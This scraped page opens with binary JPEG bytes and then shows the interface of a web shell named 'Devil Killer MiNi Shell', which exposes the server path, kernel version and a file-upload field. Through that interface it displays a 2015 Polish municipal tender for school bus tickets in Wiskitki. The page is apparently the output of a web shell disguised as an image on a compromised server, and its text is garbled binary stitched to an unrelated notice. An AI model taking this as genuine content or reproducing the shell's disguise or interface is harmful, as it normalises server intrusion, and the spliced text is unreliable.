JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151127/321880-N-2015.html

<p class="kh_header"><b>Wiskitki: Zakup biletów miesięcznych dla uczniów dojeżdżających do przedszkoli i szkół położonych na terenie gminy Wiskitki w 2016 r.</b><br>
<b>Numer ogłoszenia: 321880 - 2015; data zamieszczenia: 27.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wiskitki , ul. Kościuszki 1, 96-315 Wiskitki, woj. mazowieckie, tel. 046 8567212, faks 046 8554154.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiskitki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wiskitki.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup biletów miesięcznych dla uczniów dojeżdżających do przedszkoli i szkół położonych na terenie gminy Wiskitki w 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sprzedaż ulgowych biletów miesięcznych dla uczniów dojeżdżających do przedszkoli, szkół podstawowych i gimnazjum na terenie gminy Wiskitki                     w ramach świadczenia usługi regularnego przewozu osób, na liniach komunikacyjnych obejmujących miejscowości, z których dojeżdżają uczniowie z wyznaczonych przystanków do ww. placówek oświatowych Gminy Wiskitki i z powrotem we wszystkie dni nauki szkolnej w okresie od 01 stycznia 2016 r. do 31 grudnia 2016 r.,zgodnie z kalendarzem roku szkolnego 2015/2016 i 2016/2017 oraz normalnych biletów miesięcznych dla opiekunów zatrudnionych przez zamawiającego w celu sprawowania opieki w czasie przewozu z uwzględnieniem przerw i ferii przewidzianych w przepisach o organizacji roku szkolnego.2.Przewóz będzie polegał na zabieraniu uczniów wraz z opiekunami z wyznaczonych przystanków na określonych trasach i ich przewóz do przedszkoli i szkół na określoną godzinę i z powrotem.3.Wykonawca zobowiązany będzie do sprzedaży biletów miesięcznych komunikacji zbiorowej oddzielnie na każdy miesiąc.4. Wykonawca wykonywał będzie przewóz uczniów autobusami kursowymi w komunikacji regularnej ogólnodostępnej - jako publiczny przewóz osób, zgodnie z obowiązującym go rozkładem jazdy podanym do publicznej wiadomości na przystankach autobusowych.5.Usługa świadczona będzie taborem wykonawcy. Wykonawca jest zobowiązany dostosować do zamówienia odpowiednią liczbę środków transportu w celu realizacji przewozów zgodnie z rozkładem jazdy i ilością zakupionych biletów miesięcznych. Wykonawca powinien posiadać pojazdy, które zapewnią prawidłowe wykonanie zamówienia - dysponować autobusami o ilości miejsc zapewniających przewóz przewidywanej liczby uczniów na poszczególnych trasach z zapewnieniem miejsc siedzących dla tych uczniów.6.Według zapotrzebowania zamawiającego wykonawca ma zapewnić wykonanie następującego przewozu:a)dowóz do szkół w godz. 6.25 - 11.30;3 autobusy - ilość miejsc: 50 - 62;1autobus/bus - ilość miejsc: 20 łączna ilość uczniów: od I - VI 2016 r. - 428; od IX - XII 2016 r. - 439b) odwóz ze szkół w godz. 12.45 - 17.00;3 autobusy - ilość miejsc: 50 - 62;1 autobus/bus - ilość miejsc: 20 łączna ilość uczniów: od I - VI 2016 r. - 428; od IX - XII 2016 r. - 439 Łączna ilość km wynosi 540 km / dzień nauki szkolnej 7. Szczegółowy wykaz kierunków i kursów przedstawia się następująco: Trasy dowozu uczniów do szkoły w godz. 6.25 - 11.30 KIERUNEK/LINIA I 1) Kurs: Wiskitki - Babskie Budy - Różanów - Czerwona Niwa I, II - Kazimierzów - Aleksandrów I, II - Guzów - Guzów Osada - Wiskitki 1x kurs dziennie, ilość km dziennie - 31, liczba uczniów - od I - VI 2015 r. -  60; od IX - XII 2015 r. - 582) Kurs: Wiskitki - Wola Miedniewska - Guzów - Guzów Osada -Działki - Wiskitki 1x kurs dziennie, ilość km dziennie - 23, liczba uczniów - od I - VI 2015 r. - 58; od IX - XII 2015 r. - 58 KIERUNEK /LINIA II 1) Kurs: Wiskitki - Prościeniec - Franciszków I, II - Jesionka - Sucha Zyrardowska - Łubno I, II - Tomaszew - Sokule - Działki I, II - Wiskitki1 kurs dziennie, ilość km dziennie - 28, liczba uczniów - od I - VI 2015 r. - 60; od IX - XII 2015 r. - 60 2) Kurs: Wiskitki - Sucha Żyrardowska - Łubno I, II - Tomaszew - Sokule - Działki I, II - Wiskitki1 kurs dziennie, ilość km dziennie - 17, liczba uczniów - od I - VI 2015 r. - 49; od IX - XII 2015 r. - 60 KIERUNEK/LINIA III 1) Kurs: Wiskitki - Zagródź - Kozłowice Stare - Kozłowice Nowe - Feliksów - Drzewicz Nowy I,II - Drzewicz Stary - Oryszew - Podoryszew I, II - Duninopol I, II - Nowy Oryszew - Janówek - Cyganka -Starowiskitki -   Wiskitki 1kursy dziennie, ilość km dziennie - 28, liczba uczniów -  od I - VI 2015 r. - 46; od IX - XII 2015 r. - 44 2) Kurs: Wiskitki - Zagródź - Kozłowice Stare - Kozłowice Nowe - Feliksów - Drzewicz Nowy I, II - Drzewicz Stary - Oryszew - Podoryszew I, II - Duninopol I, II - Nowy Oryszew - Janówek - Cyganka -  Wiskitki 1kursy dziennie, ilość km dziennie - 26, liczba uczniów -  od I - VI 2015 r. - 50; od IX - XII 2015 r. - 50 3) Kurs: Wiskitki - Zagródź - Kozłowice Stare - Kozłowice Nowe - Feliksów - Drzewicz Nowy I,  - Drzewicz Stary - Oryszew - Podoryszew I, II - Duninopol I, II - Nowy Oryszew - Janówek - Cyganka -  Wiskitki 1kursy dziennie, ilość km dziennie - 24, liczba uczniów -  od I - VI 2015 r. - 60; od IX - XII 2015 r. - 51
KIERUNEK/LINIA IV1) Kurs: Sucha Żyrardowska I, II - Franciszków I, II 1x kurs dziennie, ilość km dziennie - 4, liczba uczniów - od I - VI 2015 r. - 15; od IX - XII 2015 r. - 202) Kurs: Franciszków I, II- Prościeniec I, II - Franciszków I, II 1x kurs dziennie, ilość km dziennie - 9, liczba uczniów - od I - VI 2015 r. - 16; od IX - XII 2015 r. - 20
3) Kurs: Franciszków I, II - Antoniew I, II - Smolarnia I, II - Franciszków II, I 1x kurs dziennie, ilość km dziennie - 16, liczba uczniów - od I - VI 2015 r. - 14; od IX - XII 2015 r. -15
RAZEM: 206 km, uczniów: od I - VI 2016 r. - 428; od IX - XII 2016 r. - 439 Trasy odwozu uczniów ze szkoły w godz. 11.30 -17.00 KIERUNEK/LINIA I 1) Kurs: Wiskitki - Cyganka - Starowiskitki - Wola Miedniewska - Miedniewice I, II - Kamionka - Popielarnia -  Wola Miedniewska - Guzów - Aleksandrów I, II - Kazimierzów - Czerwona Niwa I, II, - Różanów - Babskie Budy I, II - Wiskitki 1 x kurs dziennie, ilość km dziennie - 45, liczba uczniów -  od I - VI 2015 r. - 54; od IX - XII 2015 r. - 54 2) Kurs: Wiskitki - Guzów - Aleksandrów I, II - Kazimierzów - Czerwona Niwa I, II, - Różanów -  Wola Miedniewska - Wiskitki 1 x kurs dziennie, ilość km dziennie - 31, liczba uczniów -  od I - VI 2015 r. - 46; od IX - XII 2015 r. - 49 3) Kurs: Wiskitki - Guzów - Aleksandrów I, II - Kazimierzów - Czerwona Niwa I, II - Wiskitki 1 x kurs dziennie, ilość km dziennie - 26, liczba uczniów -  od I - VI 2015 r. - 13; od IX - XII 2015 r. - 10 KIERUNEK /LINIA II 1) Kurs: Wiskitki - Działki I, II- Sokole - Tomaszew - Łubno I, II - Sucha Żyrardowska - Jesionka -  Franciszków I, II - Prościeniec - Wiskitki 1 x kurs dziennie, ilość km dziennie - 28, liczba uczniów - od I - VI 2015 r. - 39; od IX - XII 2015 r. - 44 2) Kurs: Wiskitki - Działki I, II- Sokole - Tomaszew - Łubno I, II - Sucha Żyrardowska - Jesionka -  Franciszków I, II -  Wiskitki 1 x kurs dziennie, ilość km dziennie - 24, liczba uczniów - od I - VI 2015 r. - 37; od IX - XII 2015 r. - 37 3) Kurs: Wiskitki - Działki I, II- Sokole - Tomaszew - Łubno I, II - Sucha Żyrardowska 1 x kurs dziennie, ilość km dziennie - 17, liczba uczniów - od I - VI 2015 r. - 32; od IX - XII 2015 r. - 36 KIERUNEK/LINIA III 1) Kurs: Wiskitki - Zagródź - Kozłowice Stare  - Kozłowice Nowe - Feliksów - Nowy Drzewicz - Stary Drzewicz - Oryszew - Podoryszew I, II - Duninopol I, II -  Nowy Oryszew - Oryszew - Janówek - Cyganka - Starowiskitki - Wiskitki 3 x kursy dziennie, ilość km dziennie - 84, liczba uczniów -  od I - VI 2015 r. - 116; od IX - XII 2015 r. - 110 2) Kurs: Wiskitki - Zagródź - Kozłowice Stare  - Kozłowice Nowe - Feliksów - Nowy Drzewicz - Stary Drzewicz - Oryszew - Nowy Oryszew - Janówek - Cyganka - Wiskitki1x kurs dziennie, ilość km dziennie - 24, liczba uczniów - od I - VI 2015 r. - 25; od IX - XII 2015 r. - 23 3) Kurs: Wiskitki - Zagródź - Kozłowice Stare  - Kozłowice Nowe - Feliksów - Nowy Drzewicz - Stary Drzewicz - Oryszew - Podoryszew I, II - Duninopol I, II -  Nowy Oryszew - Oryszew - Janówek - Cyganka - Wiskitki 1x kurs dziennie, ilość km dziennie - 26, liczba uczniów - od I - VI 2015 r. - 21; od IX - XII 2015 r. - 21 KIERUNEK/LINIA IV 1) Kurs: Sucha Żyrardowska I, II - Franciszków I, II 1x kurs dziennie, ilość km dziennie - 4, liczba uczniów - od I - VI 2015 r. - 15; od IX - XII 2015 r. - 20 2) Kurs: Franciszków I, II- Prościeniec I, II - Franciszków I, II 1x kurs dziennie, ilość km dziennie - 9, liczba uczniów - od I - VI 2015 r. - 16; od IX - XII 2015 r. - 20 3) Kurs: Franciszków I, II - Antoniew I, II - Smolarnia I, II - Franciszków II, I 1x kurs dziennie, ilość km dziennie - 16, liczba uczniów - od I - VI 2015 r. - 14; od IX - XII 2015 r. - 15 RAZEM: 334 km, uczniów: od I - VI 2016 r. - 428; od IX - XII 2016 r. - 439 Dodatkowo do każdej trasy należy doliczyć zakup biletu miesięcznego dla opiekuna uczniów. 8. Szczegółowy wykaz linii oraz rozkłady jazdy, uwzględniające godziny rozpoczynania i kończenia zajęć w szkołach zostaną uzgodnione z wybranym wykonawcą na etapie podpisywania umowy ws. przedmiotowego zamówienia. 9. Liczba uczniów dojeżdżających na poszczególnych trasach jest liczbą, która może ulec zmianie w trakcie trwania umowy. W związku z powyższym w przypadku zmiany liczby uczniów wynagrodzenie wykonawcy wynikać będzie z faktycznej ilości zakupionych biletów miesięcznych. 10. Liczba dni nauki szkolnej w okresie realizacji zamówienia wynosi 185, z uwzględnieniem przerw świątecznych, ferii, etc. Wykonawca zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odrabiali inne dni zwolnione z nauki szkolnej. Szczegółowo liczba dni nauki szkolnej wynosi: a) styczeń - 19;
b)luty - 11;
c)marzec - 19;
d)kwiecień - 21;
e)maj - 20;
f)czerwiec - 18;
g)wrzesień - 21
h)październik - 20
i)listopad - 20
j)grudzień - 16
11.Wykonawca wyceni ofertę wykorzystując formularz oferty stanowiący załącznik nr 1 do siwz.
12.Wykonawca zobowiązany będzie do punktualnego wykonywania usługi, posiadania taboru zastępczego w przypadku awarii wskazanego pojazdu oraz kadry zastępczej w przypadku niemożności realizowania przewozów przez wskazanego kierowcę.
13.Wykonawca zobowiązany będzie do wykonywania usługi sprawnymi technicznie pojazdami posiadającymi aktualne badania techniczne. Ponadto wykonawca będzie dbał o czystość oraz o właściwy stan techniczny pojazdów zapewniający odpowiedni komfort jazdy.
14.Wykonawca zobowiązany będzie wykonywać zamówienie zgodnie z zasadami i obowiązkami wynikającymi m.in. z ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2013 r. poz. 1414 z późn. zm.) oraz ustawy z dnia 16 grudnia 2010 r. o publicznym transporcie zbiorowym (Dz.U. z 2015 r. poz. 1440).
15.Przedmiot niniejszego zamówienia musi być wykonywany zgodnie z innymi aktualnie obowiązującymi przepisami prawa w zakresie go obejmującym.
16.W przypadku zmiany przepisów prawa obejmujących przedmiot zamówienia, przy czym zamiany te wpływać będą na sposób wykonywania niniejszego zamówienia oraz będą obowiązywać w trakcie realizacji niniejszego zamówienia - zamawiający dopuści wówczas wprowadzenie tych zmian do niniejszego zamówienia, spisując w razie konieczności stosowny aneks do umowy z wybranym wykonawcą..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>a)Maksymalny zakres zamówień uzupełniających wynosi 20 % zamówienia podstawowego.
b)Zamówienia uzupełniające dotyczą zwiększenia zakresu usług objętych niniejszym zamówieniem, tj. udzielenia zamówienia na zakup dodatkowych biletów miesięcznych, czyli zwiększenie liczby zakupionych biletów miesięcznych powodujących zmianę maksymalnego wynagrodzenia Wykonawcy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym lub inny wcześniej wydany równoważny dokument (licencję) zezwalający na wykonywanie krajowego transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zamawiający uzna za spełniony, jeżeli wykonawca dołączy do oferty wykaz  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Aby warunek został uznany za spełniony w wykazie należy uwzględnić, co najmniej 3 zamówienia w tym 1 zamówienie obejmującego usługę przewozu regularnego (tj. publiczny przewóz osób i ich bagażu w określonych odstępach czasu i określonymi trasami) w sposób nieprzerwany przez okres min.10 miesięcy, minimalna wartość zamówienia wskazanego w celu spełnienia warunku wiedzy i doświadczenia winna wynosić 100.000,00 zł brutto (słownie: sto tysięcy złotych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać lub mieć możliwość dysponowania min. 4 pojazdami do przewozu osób, w tym przynajmniej jeden o pojemności 62 miejsc, jeden o pojemności 55 miejsc, jeden o pojemności 50 miejsc i jeden o pojemności minimalnej 19 miejsc, które spełniają warunki określone dla transportu drogowego osób. Pojazdy dowożące dzieci muszą posiadać sprawną instalację grzewczą, pojazdy muszą być ogrzewane zimą, aby zapewnić niezbędne minimum komfortu cieplnego przewożonym pasażerom.
Warunek dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający uzna za spełniony, jeżeli wykonawca dołączy do oferty wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. W wykazie należy uwzględnić min. 4 kierowców, którzy posiadają min. 3 letnie doświadczenie w przewozie osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości nie mniejszej niż 100.000,00 zł (słownie: sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez wykonawcę wykazu usług oraz złożenia poświadczeń dotyczy 3 usług określonych w rozdz. V pkt 2.2 siwz, w tym, co najmniej 1 usługi przewozu regularnego (tj. publiczny przewóz osób i ich bagażu w określonych odstępach czasu i określonymi trasami) w sposób nieprzerwany przez okres min. 10 miesięcy, którego minimalna wartość winna wynosić min. 100.000,00 zł brutto (słownie: sto tysięcy złotych).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

